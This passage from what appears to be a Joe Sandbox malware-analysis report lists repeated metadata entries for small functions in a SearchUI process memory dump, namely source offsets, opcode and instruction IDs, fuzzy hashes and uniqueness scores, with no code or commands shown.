                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426011B0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B1426009B0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600278, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601278, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601280, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601288, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601A88, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601290, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A58, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601A60, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600260, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A60, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601268, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A68, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A70, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600270, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601240, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A40, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601248, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A48, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601A48, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601250, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601218, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A18, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601220, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600220, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600A20, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601A20, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601228, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
